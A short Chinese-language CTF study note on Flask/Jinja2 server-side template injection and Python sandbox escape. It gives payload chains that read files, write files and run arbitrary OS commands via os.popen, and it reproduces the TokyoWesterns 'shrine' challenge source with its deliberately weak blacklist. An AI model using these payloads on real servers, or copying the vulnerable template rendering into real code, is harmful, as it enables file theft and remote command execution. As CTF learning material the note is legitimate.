FLASK SSTI模板注入Payload原理
().__class__.__bases__[0].__subclasses__()
以上代碼含義是從()找到它的父類也就是__bases__[0],而這個父類就是Python中的根類<type 'object'>,它里面有很多的子類,包括file等,這些子類中就有跟os、system等相關的方法,所以,我們可以從這些子類中找到自己需要的方法。
().__class__.__bases__[0].__subclasses__()[40](r'C:\1.php').read()//讀文件
().__class__.__bases__[0].__subclasses__()[40]('/var/www/html/input', 'w').write('123')//寫文件
().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.values()[13]['eval']('__import__("os").popen("ls /var/www/html").read()' )//執行任意命令
沙箱逃逸
關鍵在於繞過,用一些特別的操作去繞過ban掉的函數,得到flag,Python沙箱逃逸的最終目標就是執行系統任意命令
TokyoWesterns CTF-shrine
知識考點:SSTI模板注入+沙箱逃逸
解題思路
題目源碼
import flask
import os
app = flask.Flask(__name__)
app.config['FLAG'] = os.environ.pop('FLAG')
@app.route('/')
def index():
return open(__file__).read()
@app.route('/shrine/<path:shrine>')
def shrine(shrine):
def safe_jinja(s):
s = s.replace('(', '').replace(')', '')
blacklist = ['config', 'self']
return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s
return flask.render_template_string(safe_jinja(shrine))
if __name__ == '__main__':
app.run(debug=True)
參考鏈接
https://blog.csdn.net/wy_97/article/details/80393854
【TokyoWesterns CTF】shrine